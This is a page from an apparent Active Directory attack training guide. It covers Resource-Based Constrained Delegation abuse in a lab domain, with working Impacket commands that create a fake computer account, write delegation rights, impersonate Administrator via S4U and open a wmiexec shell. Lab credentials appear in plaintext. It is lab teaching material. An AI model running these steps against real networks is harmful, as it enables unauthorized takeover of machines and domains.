> For the complete documentation index, see [llms.txt](https://watchdogsacademy.gitbook.io/attacking-active-directory/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://watchdogsacademy.gitbook.io/attacking-active-directory/delegations/resource-based-constrained-delegation.md).

# Resource Based Constrained Delegation

* Resource Based Constrained delegation (RBCD)
* You can abuse RBCD when you can edit the attribute : msDS-AllowedToActOnBehalfOfOtherIdentity

#### Resource-Based Constrained Delegation

As an added functionality post-Windows Server 2012, Microsoft introduced a fine-tuned delegation method called “Resource-Based Constrained Delegation.” Resource-Based Constrained Delegation allows for delegation settings to be configured on the target service/resource instead of on the user account (interactive account). Resource-Based Constrained Delegation is implemented by “**msDS-AllowedToActOnBehalfOfOtherIdentity**” on a target computer object.

This field is available on Windows 8.1+ and Windows Server 2012+, and domain admin rights are not required to modify this field.

#### Exploitation Methodology

The exploitation of RBCD is quite easy if you paid attention to the theory above. The following steps are observed:

* Create a fake computer account
* Trigger legit machine account NYC$ via RBCD to authenticate
* Fake computer account acts on behalf of Domain Controller (NYC$) account
* Generate fake machine account’s hash
* Obtain Service Ticket
* An example of exploitation is when you got genericAll or genericWrite ACL on a Computer.
* You can find this in the lab when you look at the acl on users.
* We can see that diego.Montenegro got a generic Write on NYC
* The RBCD exploitation append with the following commands :
* Create a computer X (rbcd$)

We are using diego's password which we changed here:

[https://app.gitbook.com/o/FcWoXlVoyvVjSyaVPVSU/s/B2Dm6vWGbM7kQRITOyVl/user-acl-exploits/generic-all-on-user-centralpark-greater-than-diego.montenegro](/attacking-active-directory/user-acl-exploits/generic-all-on-user-centralpark-greater-than-diego.montenegro.md)

```
addcomputer.py -computer-name 'rbcd$' -computer-pass 'rbcdpass' -dc-host nyc.newyork.local 'newyork.local/diego.montenegro:letsdothis'
```

<figure><img src="/files/SVYZPvvRDiCK8Wyym3af" alt=""><figcaption></figcaption></figure>

* Add delegation write on our target from X (rbcd$)

```
rbcd.py -delegate-from 'rbcd$' -delegate-to 'NYC$' -dc-ip 'nyc.newyork.local' -action 'write' newyork.local/diego.montenegro:letsdothis
```

<figure><img src="/files/NVzyCxHGeL2G1GxR48lT" alt=""><figcaption></figcaption></figure>

* Now X (rbcd$) got delegation permission on our target, you can now do an s4u2self query followed by an S4u2proxy.
* This will result in an administrator permission on NYC.

```
getST.py -spn 'cifs/nyc.newyork.local' -impersonate Administrator -dc-ip 'nyc.newyork.local' 'newyork.local/rbcd$:rbcdpass'

export KRB5CCNAME=/workspace/rbcd/Administrator@cifs_nyc.newyork.local@NEWYORK.LOCAL.ccache
wmiexec.py -k -no-pass @nyc.newyork.local
```

<figure><img src="/files/4MhtGtH6d36GgHYNGOsO" alt=""><figcaption></figcaption></figure>

* After the exploit a little clean up of the lab, flush the rbcd entry and delete the computer account with a domain admin:

```
rbcd.py -delegate-from 'rbcd$' -delegate-to 'nyc$' -dc-ip 'nyc.newyork.local' -action 'flush' newyork.local/diego.Montenegro:letsdothis
addcomputer.py -computer-name 'rbcd$' -computer-pass 'rbcdpass' -dc-host nyc.newyork.local 'newyork.local/mateo.Pacheco:elsenorpacheco' -delete
```
